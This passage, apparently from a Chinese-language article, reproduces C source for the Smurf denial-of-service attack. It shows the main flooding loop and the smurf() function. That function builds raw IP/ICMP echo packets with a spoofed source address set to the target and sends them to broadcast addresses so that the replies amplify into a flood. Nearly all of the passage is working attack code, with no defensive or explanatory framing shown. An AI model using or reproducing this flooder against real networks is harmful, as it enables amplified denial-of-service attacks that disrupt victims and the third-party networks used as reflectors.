if (x == 0)
　{
　　fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
　　exit( - 1);
　}

　if (pktsize > 1024)
　{
　　fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
　　exit( - 1);
　}

　if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
　{
　　perror("getting socket");
　　exit( - 1);
　}

　setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char*) &bcast, sizeof(bcast));

　printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);

　for (i = 0; i < num || !num; i++)
　{
　　if (!(i % 25))
　　{
　　　printf(".");
　　　fflush(stdout);
　　}

　　smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
　　cycle++;
　　if (bcastaddr[cycle] == 0x0)
　　　cycle = 0;
　　usleep(delay);
　}

　puts("\n\n");
　return 0;
}

　　其中调用的smurf()函数为：

void smurf(int sock, struct sockaddr_in sin, u_long dest, int psize)
{
　struct iphdr *ip;
　struct icmphdr *icmp;
　char *packet;

　packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
　ip = (struct iphdr*)packet;
　icmp = (struct icmphdr*)(packet + sizeof(struct iphdr));

　memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);

　ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
　ip->ihl = 5;
　ip->version = 4;
　ip->ttl = 255;
　ip->tos = 0;
　ip->frag_off = 0;
　ip->protocol = IPPROTO_ICMP;
　ip->saddr = sin.sin_addr.s_addr;
　ip->daddr = dest;
　ip->check = in_chksum((u_short*)ip, sizeof(struct iphdr));
　icmp->type = 8;
　icmp->code = 0;
　icmp->checksum = in_chksum((u_short*)icmp, sizeof(struct icmphdr) + psize);

　sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize, 0, (struct sockaddr*) &sin, sizeof(struct sockaddr));

　free(packet);
}

　　(参考链接: http://dev.yesky.com/116/2667616.shtml)